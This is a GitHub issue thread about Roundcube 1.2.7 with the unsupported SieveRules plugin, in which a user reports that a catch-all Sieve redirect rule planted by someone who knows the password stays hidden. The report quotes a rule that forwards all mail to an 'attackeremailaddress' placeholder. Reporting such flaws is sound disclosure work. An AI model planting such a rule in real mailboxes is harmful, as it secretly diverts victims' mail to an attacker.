### ISSUE TITLE
Sieve hidden rules

### ISSUE THREAD

**Issue by Eseperio** [roundcube/roundcubemail#6642]
An attacker (that knows the password) can create sieve redirection rules without conditions. Those rules are not visible under sieve rules configuration.

As an example:

```
if anyof (true)
{
 redirect "someaddress@example.com";
}
```

**Comment by alecpl** [comment]
What do you mean it's not visible? I can see such a rule on the list and its content. What version, what plugins?

**Comment by Eseperio** [comment]
This is the content of the file where i found the problem:
Filename: roundcube.sieve

```
## Generated by Roundcube Webmail SieveRules Plugin ##
# rule:[..]
if anyof (true)
{
         redirect "attackeremailaddress@somedomain.com"
}
```


Roundcube 1.2.7

**Comment by alecpl** [comment]
Are you using SieveRules plugin? We do not support it. Upgrade Roundcube and use Managesieve plugin.

**Comment by Eseperio** [comment]
Ok. That was the version bundled with plesk, but i´ve seen they have updated recently to 1.3 stable.
